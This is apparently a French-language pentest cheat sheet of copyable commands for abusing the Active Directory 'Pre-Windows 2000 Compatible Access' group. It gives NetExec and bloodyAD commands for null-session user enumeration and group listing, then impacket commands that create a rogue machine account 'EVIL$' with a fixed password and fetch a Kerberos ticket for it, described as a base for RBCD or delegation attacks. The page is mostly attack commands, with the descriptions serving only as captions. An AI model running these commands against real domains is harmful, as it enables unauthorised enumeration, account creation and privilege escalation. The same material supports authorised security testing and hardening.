Copy command
nxc smb $DC -u $USER -p $PASS --groups | grep -i 'pre-windows'Description: Vérifier la présence du groupe Pre-Windows 2000 Compatible Access et ses membres.
Information Gathering
Exploiter le groupe Pre-Windows 2000 pour une énumération en null session ou créer des comptes.
nxc smb $DC -u $USER -p $PASS --groups | grep -i 'pre-windows'Description: Vérifier la présence du groupe Pre-Windows 2000 Compatible Access et ses membres.
nxc smb $DC -u '' -p '' --usersDescription: Si le groupe Pre-Win2000 inclut 'Everyone', la null session liste les utilisateurs.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'Pre-Windows 2000 Compatible Access'Description: Lister les membres du groupe : 'Everyone' ou 'Authenticated Users' indique une mauvaise config.
addcomputer.py -computer-name 'EVIL$' -computer-pass 'EvilPass123!' -dc-ip $DC $DOMAIN/$USER:$PASSDescription: Créer un compte machine (si MAQ > 0) : peut s'authentifier via Pre-Win2000 avec password vide.
getTGT.py $DOMAIN/'EVIL$':EvilPass123!Description: Obtenir un TGT pour le compte machine créé : base pour RBCD ou delegation.